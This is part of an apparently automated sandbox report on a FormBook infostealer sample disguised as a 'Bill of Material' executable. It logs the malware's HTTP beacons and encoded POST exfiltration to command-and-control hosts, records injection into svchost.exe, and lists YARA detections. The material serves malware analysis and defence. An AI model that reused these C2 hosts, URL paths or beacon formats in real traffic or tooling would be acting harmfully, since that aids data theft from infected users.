                      Aug 23, 2024 08:28:55.650414944 CEST501OUTGET /uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:57.262368917 CEST1128INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:57 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PgWsCnBi2es6aZ7e8KlEO0oRyL%2F2KXT9jiiBh1JGMSAL6QJLc1KaBHdFZipqvev8TzOm5jlMvPYax1W4gSvW0MFv7b2f2hWYZgVPNB1JNHuuIKcR5I%2BQ2Uo9arhdu%2BYqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8b790b9a6b2c72a4-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      49192.168.2.649772192.185.211.122806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:29:02.311053991 CEST772OUTPOST /7o3y/ HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.tadalaturbo.online
                      Referer: http://www.tadalaturbo.online/7o3y/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 2f 4c 4a 55 67 6d 59 55 65 35 45 67 4f 61 58 56 39 31 55 41 56 6d 56 38 72 34 6d 6a 31 30 6f 6c 57 73 70 4a 73 32 34 63 44 2f 36 77 6c 62 4d 4f 71 52 58 69 6a 37 52 59 6e 39 6c 74 64 4b 36 56 73 4c 58 55 68 72 6b 49 39 76 72 5a 65 74 65 41 37 53 32 44 68 4a 6b 4e 44 35 63 68 71 79 52 67 45 33 6a 5a 4b 53 77 68 73 62 44 53 6d 6a 41 53 64 46 72 41 6e 37 6a 79 39 76 70 42 50 47 4d 34 2f 30 64 63 4b 75 36 37 36 6d 36 46 57 32 45 75 4e 70 33 66 67 34 62 6d 55 45 51 62 6f 2b 52 5a 57 62 31 6a 35 36 79 76 43 69 58 6c 31 37 52 46 53 74 30 51 62 30 47 48 4b 59 45 67 55 73 4f 4f
                      Data Ascii: Xn70_=66z2jmSSsQro/LJUgmYUe5EgOaXV91UAVmV8r4mj10olWspJs24cD/6wlbMOqRXij7RYn9ltdK6VsLXUhrkI9vrZeteA7S2DhJkND5chqyRgE3jZKSwhsbDSmjASdFrAn7jy9vpBPGM4/0dcKu676m6FW2EuNp3fg4bmUEQbo+RZWb1j56yvCiXl17RFSt0Qb0GHKYEgUsOO
                      Aug 23, 2024 08:29:02.797281027 CEST1121INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:02 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Vary: Accept-Encoding
                      Content-Encoding: gzip
                      Content-Length: 836
                      Content-Type: text/html
                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                      Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      50192.168.2.649773192.185.211.122806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:29:04.854410887 CEST796OUTPOST /7o3y/ HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.tadalaturbo.online
                      Referer: http://www.tadalaturbo.online/7o3y/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 74 61 5a 55 77 78 4d 55 63 5a 45 6a 41 36 58 56 6b 46 55 45 56 6d 52 38 72 37 72 6d 31 6d 38 6c 56 4a 4e 4a 69 58 34 63 45 2f 36 77 69 72 4d 50 6e 78 58 35 6a 37 63 6e 6e 35 74 74 64 4b 65 56 73 4a 66 55 30 4b 6b 4c 37 2f 72 62 55 39 65 65 34 69 32 44 68 4a 6b 4e 44 35 59 59 71 79 5a 67 45 6b 37 5a 4c 77 59 75 77 4c 44 52 68 6a 41 53 5a 46 72 45 6e 37 6a 55 39 71 77 4a 50 46 6b 34 2f 31 74 63 4e 2f 36 34 76 32 36 50 61 6d 46 45 42 70 54 54 75 65 53 6d 65 79 51 4c 2f 75 42 48 58 74 30 35 6c 4a 79 4d 51 79 33 6e 31 35 4a 33 53 4e 30 36 5a 30 2b 48 59 50 49 48 62 59 72 74 36 38 52 73 4b 58 72 72 79 54 31 44 36 5a 48 74 65 37 4d 65 32 41 3d 3d
                      Data Ascii: Xn70_=66z2jmSSsQrotaZUwxMUcZEjA6XVkFUEVmR8r7rm1m8lVJNJiX4cE/6wirMPnxX5j7cnn5ttdKeVsJfU0KkL7/rbU9ee4i2DhJkND5YYqyZgEk7ZLwYuwLDRhjASZFrEn7jU9qwJPFk4/1tcN/64v26PamFEBpTTueSmeyQL/uBHXt05lJyMQy3n15J3SN06Z0+HYPIHbYrt68RsKXrryT1D6ZHte7Me2A==
                      Aug 23, 2024 08:29:05.344383001 CEST1121INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:05 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Vary: Accept-Encoding
                      Content-Encoding: gzip
                      Content-Length: 836
                      Content-Type: text/html
                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                      Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      51192.168.2.649774192.185.211.122806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:29:07.403553963 CEST1809OUTPOST /7o3y/ HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.tadalaturbo.online
                      Referer: http://www.tadalaturbo.online/7o3y/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 74 61 5a 55 77 78 4d 55 63 5a 45 6a 41 36 58 56 6b 46 55 45 56 6d 52 38 72 37 72 6d 31 6d 6b 6c 57 37 46 4a 74 55 51 63 46 2f 36 77 74 37 4d 43 6e 78 57 68 6a 36 30 6a 6e 35 70 58 64 49 57 56 73 71 48 55 6c 66 45 4c 79 2f 72 62 63 64 65 66 37 53 32 73 68 49 55 33 44 35 49 59 71 79 5a 67 45 69 2f 5a 66 53 77 75 79 4c 44 53 6d 6a 41 65 64 46 72 38 6e 37 37 71 39 71 38 5a 49 30 45 34 34 56 39 63 4d 4a 75 34 79 47 36 42 62 57 46 63 42 70 75 4e 75 66 36 41 65 79 4d 6c 2f 6f 39 48 58 4a 46 5a 67 4e 43 44 4e 42 48 44 6d 71 6c 2b 54 74 45 2b 58 6c 72 32 51 63 5a 30 56 71 62 65 78 4a 4e 61 41 55 53 54 6e 54 59 6a 31 73 58 35 56 34 35 48 70 74 52 48 32 57 37 4d 5a 49 50 38 58 64 64 31 61 55 4b 4b 31 62 66 7a 39 36 35 44 4c 61 79 72 43 32 2f 4f 54 59 77 62 4d 52 7a 4e 62 2f 63 6b 33 70 34 7a 55 67 34 64 36 63 6c 49 50 78 37 70 2f 76 4d 53 76 68 55 58 44 6d 66 41 39 50 54 52 36 6f 5a 61 41 4c 4e 51 56 66 38 57 6e 75 47 4a 69 44 32 4b 72 42 36 45 56 5a 6a 6f [TRUNCATED]
                      Data Ascii: Xn70_=66z2jmSSsQrotaZUwxMUcZEjA6XVkFUEVmR8r7rm1mklW7FJtUQcF/6wt7MCnxWhj60jn5pXdIWVsqHUlfELy/rbcdef7S2shIU3D5IYqyZgEi/ZfSwuyLDSmjAedFr8n77q9q8ZI0E44V9cMJu4yG6BbWFcBpuNuf6AeyMl/o9HXJFZgNCDNBHDmql+TtE+Xlr2QcZ0VqbexJNaAUSTnTYj1sX5V45HptRH2W7MZIP8Xdd1aUKK1bfz965DLayrC2/OTYwbMRzNb/ck3p4zUg4d6clIPx7p/vMSvhUXDmfA9PTR6oZaALNQVf8WnuGJiD2KrB6EVZjo6YqDf1VXSJ0O8w82jNd86RrZmt6ZYhdw0jrgDgEK5S0LuxC4SwaHaRLKlnxtav27nEiDtDu0T0YQXDQjGlV60PbDOkdIhEypI8QsIDt0FEOucOr4J5NB1hwPRCUtOoKRu5E8OeObmTaskpXqqDLgsIQGO/9+QnJv9vxdMvEahac0KvZmop1TI0U68c6Pp7zEFgwn06+2tRLmxCRXGEZcAKy0jygFIR+gQ2phsUrufGjHhOqJTKHc6Y6eitR4H+K0eBj6ZicUYO8UaFT1tpoMvLtOyb6zP6NDCZEFBQfv2YwASxkG2tqjvmK7cokmDe0+HIyV9O7CW704yi8iRjBtgKzkM+xL5aA8uX75s4dRSdV6K8P8RYsQC4BcLiZG1Odi7CwFwFf6BIgeIoVodK5zQrprFDdvSdJdzp0P4h6pEMsooRefWGJocJOs3Fg315Ze1RUAWUjw2cCTP2toJNvx/zMmD/HZP5Bt01L0awlHVSig4bMRyWEmPE6ipj1E9CCHPXeOMO9F310NQh2NByHknIKPYh88KjrXhdTfscH1Jttwiif9wkUur/NOAJswy3sBHdI9+qCtwvseI9eLXeuhimB+rwb6COndqm5o7xm5NysAWBPVYAx4dnC5qtB4vzlwH7sDMlkpymTRzFjPD4KeBwFkb0Bs+2qoEV [TRUNCATED]
                      Aug 23, 2024 08:29:07.912918091 CEST1121INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:07 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Vary: Accept-Encoding
                      Content-Encoding: gzip
                      Content-Length: 836
                      Content-Type: text/html
                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                      Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      52192.168.2.649775192.185.211.122806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:29:09.948939085 CEST509OUTGET /7o3y/?mV=ZpN4DLSXOzy8qX&Xn70_=34bWgTnU4AX1gKZpgT03P58mZraF9WQxUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UwsXUXfif+FOOr40nRowl+nZyE3/KMRkY0oHOpy0tGVDF3Z+R9aA= HTTP/1.1
                      Host: www.tadalaturbo.online
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:29:10.453043938 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:29:10 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                      Accept-Ranges: bytes
                      Content-Length: 2361
                      Vary: Accept-Encoding
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
                      Aug 23, 2024 08:29:10.453053951 CEST124INData Raw: 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70
                      Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple
                      Aug 23, 2024 08:29:10.453190088 CEST1236INData Raw: 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 3e 0d 0a 20 20 20
                      Data Ascii: -touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.css" rel="stylesheet">
                      Aug 23, 2024 08:29:10.453193903 CEST27INData Raw: 2f 64 69 76 3e 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: /div> </body></html>


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:02:25:04
                      Start date:23/08/2024
                      Path:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
                      Imagebase:0x330000
                      File size:1'247'232 bytes
                      MD5 hash:806F72C900778DECCF64F8A4EC8CDBC9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:02:25:05
                      Start date:23/08/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
                      Imagebase:0xea0000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:02:25:32
                      Start date:23/08/2024
                      Path:C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe"
